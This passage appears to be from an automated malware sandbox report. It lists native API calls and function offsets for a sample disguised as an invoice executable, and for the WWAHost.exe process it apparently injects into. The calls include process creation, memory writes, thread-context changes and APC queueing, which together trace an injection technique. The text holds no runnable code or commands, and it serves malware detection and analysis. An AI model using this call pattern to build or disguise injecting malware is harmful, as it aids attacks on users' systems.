          Source: C:\Users\user\Desktop\Invoice_CAII00008052.exeCode function: 2_2_00417740 NtReadFile,2_2_00417740
          Source: C:\Users\user\Desktop\Invoice_CAII00008052.exeCode function: 2_2_004177C0 NtClose,2_2_004177C0
          Source: C:\Users\user\Desktop\Invoice_CAII00008052.exeCode function: 2_2_0041773A NtReadFile,2_2_0041773A
          Source: C:\Users\user\Desktop\Invoice_CAII00008052.exeCode function: 2_2_00ACA2D0 NtClose,LdrInitializeThunk,2_2_00ACA2D0
          Source: C:\Users\user\Desktop\Invoice_CAII00008052.exeCode function: 2_2_00ACA240 NtReadFile,LdrInitializeThunk,2_2_00ACA240
          Source: C:\Users\user\Desktop\Invoice_CAII00008052.exeCode function: 2_2_00ACA3E0 NtFreeVirtualMemory,LdrInitializeThunk,2_2_00ACA3E0
          Source: C:\Users\user\Desktop\Invoice_CAII00008052.exeCode function: 2_2_00ACA360 NtAllocateVirtualMemory,LdrInitializeThunk,2_2_00ACA360
          Source: C:\Users\user\Desktop\Invoice_CAII00008052.exeCode function: 2_2_00ACA4A0 NtUnmapViewOfSection,LdrInitializeThunk,2_2_00ACA4A0
          Source: C:\Users\user\Desktop\Invoice_CAII00008052.exeCode function: 2_2_00ACA480 NtMapViewOfSection,LdrInitializeThunk,2_2_00ACA480
          Source: C:\Users\user\Desktop\Invoice_CAII00008052.exeCode function: 2_2_00ACACE0 NtCreateMutant,LdrInitializeThunk,2_2_00ACACE0
          Source: C:\Users\user\Desktop\Invoice_CAII00008052.exeCode function: 2_2_00ACA410 NtQueryInformationToken,LdrInitializeThunk,2_2_00ACA410
          Source: C:\Users\user\Desktop\Invoice_CAII00008052.exeCode function: 2_2_00ACA5F0 NtReadVirtualMemory,LdrInitializeThunk,2_2_00ACA5F0
          Source: C:\Users\user\Desktop\Invoice_CAII00008052.exeCode function: 2_2_00ACA560 NtQuerySystemInformation,LdrInitializeThunk,2_2_00ACA560
          Source: C:\Users\user\Desktop\Invoice_CAII00008052.exeCode function: 2_2_00ACA540 NtDelayExecution,LdrInitializeThunk,2_2_00ACA540
          Source: C:\Users\user\Desktop\Invoice_CAII00008052.exeCode function: 2_2_00ACA6A0 NtCreateSection,LdrInitializeThunk,2_2_00ACA6A0
          Source: C:\Users\user\Desktop\Invoice_CAII00008052.exeCode function: 2_2_00ACA610 NtAdjustPrivilegesToken,LdrInitializeThunk,2_2_00ACA610
          Source: C:\Users\user\Desktop\Invoice_CAII00008052.exeCode function: 2_2_00ACA720 NtResumeThread,LdrInitializeThunk,2_2_00ACA720
          Source: C:\Users\user\Desktop\Invoice_CAII00008052.exeCode function: 2_2_00ACA700 NtProtectVirtualMemory,LdrInitializeThunk,2_2_00ACA700
          Source: C:\Users\user\Desktop\Invoice_CAII00008052.exeCode function: 2_2_00ACA750 NtCreateFile,LdrInitializeThunk,2_2_00ACA750
          Source: C:\Users\user\Desktop\Invoice_CAII00008052.exeCode function: 2_2_00ACB0B0 NtGetContextThread,2_2_00ACB0B0
          Source: C:\Users\user\Desktop\Invoice_CAII00008052.exeCode function: 2_2_00ACA800 NtSetValueKey,2_2_00ACA800
          Source: C:\Users\user\Desktop\Invoice_CAII00008052.exeCode function: 2_2_00ACA2F0 NtQueryInformationFile,2_2_00ACA2F0
          Source: C:\Users\user\Desktop\Invoice_CAII00008052.exeCode function: 2_2_00ACA220 NtWaitForSingleObject,2_2_00ACA220
          Source: C:\Users\user\Desktop\Invoice_CAII00008052.exeCode function: 2_2_00ACBA30 NtSetContextThread,2_2_00ACBA30
          Source: C:\Users\user\Desktop\Invoice_CAII00008052.exeCode function: 2_2_00ACA260 NtWriteFile,2_2_00ACA260
          Source: C:\Users\user\Desktop\Invoice_CAII00008052.exeCode function: 2_2_00ACA3D0 NtCreateKey,2_2_00ACA3D0
          Source: C:\Users\user\Desktop\Invoice_CAII00008052.exeCode function: 2_2_00ACA310 NtEnumerateValueKey,2_2_00ACA310
          Source: C:\Users\user\Desktop\Invoice_CAII00008052.exeCode function: 2_2_00ACA370 NtQueryInformationProcess,2_2_00ACA370
          Source: C:\Users\user\Desktop\Invoice_CAII00008052.exeCode function: 2_2_00ACA350 NtQueryValueKey,2_2_00ACA350
          Source: C:\Users\user\Desktop\Invoice_CAII00008052.exeCode function: 2_2_00ACA430 NtQueryVirtualMemory,2_2_00ACA430
          Source: C:\Users\user\Desktop\Invoice_CAII00008052.exeCode function: 2_2_00ACB410 NtOpenProcessToken,2_2_00ACB410
          Source: C:\Users\user\Desktop\Invoice_CAII00008052.exeCode function: 2_2_00ACA460 NtOpenProcess,2_2_00ACA460
          Source: C:\Users\user\Desktop\Invoice_CAII00008052.exeCode function: 2_2_00ACA470 NtSetInformationFile,2_2_00ACA470
          Source: C:\Users\user\Desktop\Invoice_CAII00008052.exeCode function: 2_2_00ACB470 NtOpenThread,2_2_00ACB470
          Source: C:\Users\user\Desktop\Invoice_CAII00008052.exeCode function: 2_2_00ACA5A0 NtWriteVirtualMemory,2_2_00ACA5A0
          Source: C:\Users\user\Desktop\Invoice_CAII00008052.exeCode function: 2_2_00ACA520 NtEnumerateKey,2_2_00ACA520
          Source: C:\Users\user\Desktop\Invoice_CAII00008052.exeCode function: 2_2_00ACBD40 NtSuspendThread,2_2_00ACBD40
          Source: C:\Users\user\Desktop\Invoice_CAII00008052.exeCode function: 2_2_00ACA6D0 NtCreateProcessEx,2_2_00ACA6D0
          Source: C:\Users\user\Desktop\Invoice_CAII00008052.exeCode function: 2_2_00ACA650 NtQueueApcThread,2_2_00ACA650
          Source: C:\Users\user\Desktop\Invoice_CAII00008052.exeCode function: 2_2_00ACA780 NtOpenDirectoryObject,2_2_00ACA780
          Source: C:\Users\user\Desktop\Invoice_CAII00008052.exeCode function: 2_2_00ACA710 NtQuerySection,2_2_00ACA710
          Source: C:\Users\user\Desktop\Invoice_CAII00008052.exeCode function: 2_1_00417870 NtAllocateVirtualMemory,2_1_00417870
          Source: C:\Users\user\Desktop\Invoice_CAII00008052.exeCode function: 2_1_00417690 NtCreateFile,2_1_00417690
          Source: C:\Users\user\Desktop\Invoice_CAII00008052.exeCode function: 2_1_00417740 NtReadFile,2_1_00417740
          Source: C:\Users\user\Desktop\Invoice_CAII00008052.exeCode function: 2_1_004177C0 NtClose,2_1_004177C0
          Source: C:\Users\user\Desktop\Invoice_CAII00008052.exeCode function: 2_1_0041773A NtReadFile,2_1_0041773A
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 8_2_038EA3D0 NtCreateKey,LdrInitializeThunk,8_2_038EA3D0
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 8_2_038EA3E0 NtFreeVirtualMemory,LdrInitializeThunk,8_2_038EA3E0
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 8_2_038EA310 NtEnumerateValueKey,LdrInitializeThunk,8_2_038EA310
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 8_2_038EA350 NtQueryValueKey,LdrInitializeThunk,8_2_038EA350
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 8_2_038EA360 NtAllocateVirtualMemory,LdrInitializeThunk,8_2_038EA360
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 8_2_038EA2D0 NtClose,LdrInitializeThunk,8_2_038EA2D0
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 8_2_038EA240 NtReadFile,LdrInitializeThunk,8_2_038EA240
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 8_2_038EA800 NtSetValueKey,LdrInitializeThunk,8_2_038EA800
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 8_2_038EA750 NtCreateFile,LdrInitializeThunk,8_2_038EA750
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 8_2_038EA6A0 NtCreateSection,LdrInitializeThunk,8_2_038EA6A0
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 8_2_038EA610 NtAdjustPrivilegesToken,LdrInitializeThunk,8_2_038EA610
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 8_2_038EA540 NtDelayExecution,LdrInitializeThunk,8_2_038EA540
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 8_2_038EA560 NtQuerySystemInformation,LdrInitializeThunk,8_2_038EA560
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 8_2_038EA480 NtMapViewOfSection,LdrInitializeThunk,8_2_038EA480
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 8_2_038EACE0 NtCreateMutant,LdrInitializeThunk,8_2_038EACE0
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 8_2_038EA410 NtQueryInformationToken,LdrInitializeThunk,8_2_038EA410
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 8_2_038EA370 NtQueryInformationProcess,8_2_038EA370
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 8_2_038EA2F0 NtQueryInformationFile,8_2_038EA2F0
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 8_2_038EA220 NtWaitForSingleObject,8_2_038EA220
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 8_2_038EBA30 NtSetContextThread,8_2_038EBA30
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 8_2_038EA260 NtWriteFile,8_2_038EA260
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 8_2_038EB0B0 NtGetContextThread,8_2_038EB0B0
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 8_2_038EA780 NtOpenDirectoryObject,8_2_038EA780
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 8_2_038EA700 NtProtectVirtualMemory,8_2_038EA700
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 8_2_038EA710 NtQuerySection,8_2_038EA710
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 8_2_038EA720 NtResumeThread,8_2_038EA720
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 8_2_038EA6D0 NtCreateProcessEx,8_2_038EA6D0
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 8_2_038EA650 NtQueueApcThread,8_2_038EA650
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 8_2_038EA5A0 NtWriteVirtualMemory,8_2_038EA5A0
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 8_2_038EA5F0 NtReadVirtualMemory,8_2_038EA5F0
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 8_2_038EA520 NtEnumerateKey,8_2_038EA520
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 8_2_038EBD40 NtSuspendThread,8_2_038EBD40
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 8_2_038EA4A0 NtUnmapViewOfSection,8_2_038EA4A0
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 8_2_038EB410 NtOpenProcessToken,8_2_038EB410
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 8_2_038EA430 NtQueryVirtualMemory,8_2_038EA430
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 8_2_038EA460 NtOpenProcess,8_2_038EA460
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 8_2_038EA470 NtSetInformationFile,8_2_038EA470
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 8_2_038EB470 NtOpenThread,8_2_038EB470
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 8_2_02DA7870 NtAllocateVirtualMemory,8_2_02DA7870
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 8_2_02DA7690 NtCreateFile,8_2_02DA7690
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 8_2_02DA77C0 NtClose,8_2_02DA77C0
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 8_2_02DA7740 NtReadFile,8_2_02DA7740
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 8_2_02DA773A NtReadFile,8_2_02DA773A
          Source: C:\Users\user\Desktop\Invoice_CAII00008052.exeCode function: 0_2_0045C4900_2_0045C490
          Source: C:\Users\user\Desktop\Invoice_CAII00008052.exeCode function: 0_2_004572C40_2_004572C4
          Source: C:\Users\user\Desktop\Invoice_CAII00008052.exeCode function: 2_2_004010302_2_00401030
          Source: C:\Users\user\Desktop\Invoice_CAII00008052.exeCode function: 2_2_0041B1722_2_0041B172
          Source: C:\Users\user\Desktop\Invoice_CAII00008052.exeCode function: 2_2_0041A9EA2_2_0041A9EA
          Source: C:\Users\user\Desktop\Invoice_CAII00008052.exeCode function: 2_2_0041B2F82_2_0041B2F8
          Source: C:\Users\user\Desktop\Invoice_CAII00008052.exeCode function: 2_2_0041AAAF2_2_0041AAAF
          Source: C:\Users\user\Desktop\Invoice_CAII00008052.exeCode function: 2_2_00408B402_2_00408B40
          Source: C:\Users\user\Desktop\Invoice_CAII00008052.exeCode function: 2_2_00408B3B2_2_00408B3B
          Source: C:\Users\user\Desktop\Invoice_CAII00008052.exeCode function: 2_2_0041AC702_2_0041AC70
          Source: C:\Users\user\Desktop\Invoice_CAII00008052.exeCode function: 2_2_00402D902_2_00402D90
          Source: C:\Users\user\Desktop\Invoice_CAII00008052.exeCode function: 2_2_0041B5BB2_2_0041B5BB
          Source: C:\Users\user\Desktop\Invoice_CAII00008052.exeCode function: 2_2_0041A6662_2_0041A666
          Source: C:\Users\user\Desktop\Invoice_CAII00008052.exeCode function: 2_2_0041B6CE2_2_0041B6CE
          Source: C:\Users\user\Desktop\Invoice_CAII00008052.exeCode function: 2_2_0041AEDE2_2_0041AEDE
          Source: C:\Users\user\Desktop\Invoice_CAII00008052.exeCode function: 2_2_00402FB02_2_00402FB0
          Source: C:\Users\user\Desktop\Invoice_CAII00008052.exeCode function: 2_2_00B318B62_2_00B318B6
          Source: C:\Users\user\Desktop\Invoice_CAII00008052.exeCode function: 2_2_00A9A0802_2_00A9A080
          Source: C:\Users\user\Desktop\Invoice_CAII00008052.exeCode function: 2_2_00B528E82_2_00B528E8
          Source: C:\Users\user\Desktop\Invoice_CAII00008052.exeCode function: 2_2_00AB48CB2_2_00AB48CB
          Source: C:\Users\user\Desktop\Invoice_CAII00008052.exeCode function: 2_2_00AB00212_2_00AB0021
          Source: C:\Users\user\Desktop\Invoice_CAII00008052.exeCode function: 2_2_00ABE0202_2_00ABE020
          Source: C:\Users\user\Desktop\Invoice_CAII00008052.exeCode function: 2_2_00B4D0162_2_00B4D016
          Source: C:\Users\user\Desktop\Invoice_CAII00008052.exeCode function: 2_2_00AB98102_2_00AB9810
          Source: C:\Users\user\Desktop\Invoice_CAII00008052.exeCode function: 2_2_00AB10702_2_00AB1070
          Source: C:\Users\user\Desktop\Invoice_CAII00008052.exeCode function: 2_2_00B5D9BE2_2_00B5D9BE
          Source: C:\Users\user\Desktop\Invoice_CAII00008052.exeCode function: 2_2_00AB61802_2_00AB6180
          Source: C:\Users\user\Desktop\Invoice_CAII00008052.exeCode function: 2_2_00B519E22_2_00B519E2
          Source: C:\Users\user\Desktop\Invoice_CAII00008052.exeCode function: 2_2_00B461DF2_2_00B461DF
          Source: C:\Users\user\Desktop\Invoice_CAII00008052.exeCode function: 2_2_00AD99062_2_00AD9906
          Source: C:\Users\user\Desktop\Invoice_CAII00008052.exeCode function: 2_2_00AB71102_2_00AB7110
          Source: C:\Users\user\Desktop\Invoice_CAII00008052.exeCode function: 2_2_00AB594B2_2_00AB594B
          Source: C:\Users\user\Desktop\Invoice_CAII00008052.exeCode function: 2_2_00AA42B02_2_00AA42B0
          Source: C:\Users\user\Desktop\Invoice_CAII00008052.exeCode function: 2_2_00B51A992_2_00B51A99
          Source: C:\Users\user\Desktop\Invoice_CAII00008052.exeCode function: 2_2_00B522DD2_2_00B522DD
          Source: C:\Users\user\Desktop\Invoice_CAII00008052.exeCode function: 2_2_00AB523D2_2_00AB523D
          Source: C:\Users\user\Desktop\Invoice_CAII00008052.exeCode function: 2_2_00B5E2142_2_00B5E214
          Source: C:\Users\user\Desktop\Invoice_CAII00008052.exeCode function: 2_2_00B40A022_2_00B40A02
          Source: C:\Users\user\Desktop\Invoice_CAII00008052.exeCode function: 2_2_00AB4A5B2_2_00AB4A5B
          Source: C:\Users\user\Desktop\Invoice_CAII00008052.exeCode function: 2_2_00AB4B962_2_00AB4B96
          Source: C:\Users\user\Desktop\Invoice_CAII00008052.exeCode function: 2_2_00A8EBE02_2_00A8EBE0
          Source: C:\Users\user\Desktop\Invoice_CAII00008052.exeCode function: 2_2_00AB63C22_2_00AB63C2
          Source: C:\Users\user\Desktop\Invoice_CAII00008052.exeCode function: 2_2_00AAFB402_2_00AAFB40
          Source: C:\Users\user\Desktop\Invoice_CAII00008052.exeCode function: 2_2_00B434902_2_00B43490
          Source: C:\Users\user\Desktop\Invoice_CAII00008052.exeCode function: 2_2_00B51C9F2_2_00B51C9F
          Source: C:\Users\user\Desktop\Invoice_CAII00008052.exeCode function: 2_2_00B52C9A2_2_00B52C9A
          Source: C:\Users\user\Desktop\Invoice_CAII00008052.exeCode function: 2_2_00B444EF2_2_00B444EF
          Source: C:\Users\user\Desktop\Invoice_CAII00008052.exeCode function: 2_2_00B4DCC52_2_00B4DCC5
          Source: C:\Users\user\Desktop\Invoice_CAII00008052.exeCode function: 2_2_00B3F42B2_2_00B3F42B
          Source: C:\Users\user\Desktop\Invoice_CAII00008052.exeCode function: 2_2_00A9740C2_2_00A9740C
          Source: C:\Users\user\Desktop\Invoice_CAII00008052.exeCode function: 2_2_00AA14102_2_00AA1410
          Source: C:\Users\user\Desktop\Invoice_CAII00008052.exeCode function: 2_2_00AB547E2_2_00AB547E
          Source: C:\Users\user\Desktop\Invoice_CAII00008052.exeCode function: 2_2_00B4E5812_2_00B4E581
          Source: C:\Users\user\Desktop\Invoice_CAII00008052.exeCode function: 2_2_00B2E58A2_2_00B2E58A
          Source: C:\Users\user\Desktop\Invoice_CAII00008052.exeCode function: 2_2_00B31DE32_2_00B31DE3
          Source: C:\Users\user\Desktop\Invoice_CAII00008052.exeCode function: 2_2_00B4D5D22_2_00B4D5D2
          Source: C:\Users\user\Desktop\Invoice_CAII00008052.exeCode function: 2_2_00B3FDDB2_2_00B3FDDB
          Source: C:\Users\user\Desktop\Invoice_CAII00008052.exeCode function: 2_2_00B2C53F2_2_00B2C53F
          Source: C:\Users\user\Desktop\Invoice_CAII00008052.exeCode function: 2_2_00AA15302_2_00AA1530
          Source: C:\Users\user\Desktop\Invoice_CAII00008052.exeCode function: 2_2_00B525192_2_00B52519
          Source: C:\Users\user\Desktop\Invoice_CAII00008052.exeCode function: 2_2_00B41D1B2_2_00B41D1B
          Source: C:\Users\user\Desktop\Invoice_CAII00008052.exeCode function: 2_2_00A80D402_2_00A80D40
          Source: C:\Users\user\Desktop\Invoice_CAII00008052.exeCode function: 2_2_00B43E962_2_00B43E96
          Source: C:\Users\user\Desktop\Invoice_CAII00008052.exeCode function: 2_2_00B526F82_2_00B526F8
          Source: C:\Users\user\Desktop\Invoice_CAII00008052.exeCode function: 2_2_00AB66112_2_00AB6611
          Source: C:\Users\user\Desktop\Invoice_CAII00008052.exeCode function: 2_2_00AB4E612_2_00AB4E61
          Source: C:\Users\user\Desktop\Invoice_CAII00008052.exeCode function: 2_2_00B4CE662_2_00B4CE66
          Source: C:\Users\user\Desktop\Invoice_CAII00008052.exeCode function: 2_2_00AB5E702_2_00AB5E70
          Source: C:\Users\user\Desktop\Invoice_CAII00008052.exeCode function: 2_2_00AA76402_2_00AA7640
          Source: C:\Users\user\Desktop\Invoice_CAII00008052.exeCode function: 2_2_00B427822_2_00B42782
          Source: C:\Users\user\Desktop\Invoice_CAII00008052.exeCode function: 2_2_00AA57902_2_00AA5790
          Source: C:\Users\user\Desktop\Invoice_CAII00008052.exeCode function: 2_2_00B51FCE2_2_00B51FCE
          Source: C:\Users\user\Desktop\Invoice_CAII00008052.exeCode function: 2_2_00B517462_2_00B51746
          Source: C:\Users\user\Desktop\Invoice_CAII00008052.exeCode function: 2_1_004010302_1_00401030
          Source: C:\Users\user\Desktop\Invoice_CAII00008052.exeCode function: 2_1_0041B1722_1_0041B172
          Source: C:\Users\user\Desktop\Invoice_CAII00008052.exeCode function: 2_1_0041A9EA2_1_0041A9EA
          Source: C:\Users\user\Desktop\Invoice_CAII00008052.exeCode function: 2_1_0041B2F82_1_0041B2F8
          Source: C:\Users\user\Desktop\Invoice_CAII00008052.exeCode function: 2_1_0041AAAF2_1_0041AAAF
          Source: C:\Users\user\Desktop\Invoice_CAII00008052.exeCode function: 2_1_00408B402_1_00408B40
          Source: C:\Users\user\Desktop\Invoice_CAII00008052.exeCode function: 2_1_00408B3B2_1_00408B3B
          Source: C:\Users\user\Desktop\Invoice_CAII00008052.exeCode function: 2_1_0041AC702_1_0041AC70
          Source: C:\Users\user\Desktop\Invoice_CAII00008052.exeCode function: 2_1_00402D902_1_00402D90
          Source: C:\Users\user\Desktop\Invoice_CAII00008052.exeCode function: 2_1_0041B5BB2_1_0041B5BB
          Source: C:\Users\user\Desktop\Invoice_CAII00008052.exeCode function: 2_1_0041A6662_1_0041A666
          Source: C:\Users\user\Desktop\Invoice_CAII00008052.exeCode function: 2_1_0041B6CE2_1_0041B6CE
          Source: C:\Users\user\Desktop\Invoice_CAII00008052.exeCode function: 2_1_0041AEDE2_1_0041AEDE
          Source: C:\Users\user\Desktop\Invoice_CAII00008052.exeCode function: 2_1_00402FB02_1_00402FB0
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 8_2_038D4B968_2_038D4B96
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 8_2_038D63C28_2_038D63C2
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 8_2_038AEBE08_2_038AEBE0
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 8_2_038CFB408_2_038CFB40
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 8_2_03971A998_2_03971A99
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 8_2_038C42B08_2_038C42B0
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 8_2_039722DD8_2_039722DD
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 8_2_0397E2148_2_0397E214
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 8_2_03960A028_2_03960A02
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 8_2_038D523D8_2_038D523D
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 8_2_038D4A5B8_2_038D4A5B
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 8_2_038D61808_2_038D6180
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 8_2_0397D9BE8_2_0397D9BE
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 8_2_039661DF8_2_039661DF
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 8_2_039719E28_2_039719E2
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 8_2_038F99068_2_038F9906
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 8_2_038D71108_2_038D7110
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 8_2_038D594B8_2_038D594B
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 8_2_038BA0808_2_038BA080
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 8_2_039518B68_2_039518B6
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 8_2_038D48CB8_2_038D48CB
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 8_2_039728E88_2_039728E8
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 8_2_0396D0168_2_0396D016
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 8_2_038D98108_2_038D9810
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 8_2_038D00218_2_038D0021
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 8_2_038DE0208_2_038DE020
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 8_2_038D10708_2_038D1070
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 8_2_039627828_2_03962782
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 8_2_038C57908_2_038C5790
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 8_2_03971FCE8_2_03971FCE
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 8_2_039717468_2_03971746
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 8_2_03963E968_2_03963E96
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 8_2_039726F88_2_039726F8
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 8_2_038D66118_2_038D6611
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 8_2_038C76408_2_038C7640
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 8_2_038D4E618_2_038D4E61
          Source: C:\Windows\SysWOW64\WWAHost.e